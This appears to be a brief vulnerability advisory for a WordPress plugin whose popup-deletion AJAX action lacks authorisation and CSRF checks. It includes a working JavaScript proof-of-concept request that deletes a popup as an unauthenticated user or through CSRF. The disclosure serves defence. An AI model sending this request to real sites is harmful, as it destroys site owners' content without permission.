The plugin does not have authorisation and CSRF checks when deleting popups, which could allow unauthenticated users to delete them
As an unauthenticated users, or via CSRF:
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=pm_delete_popup&popup_id=2',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));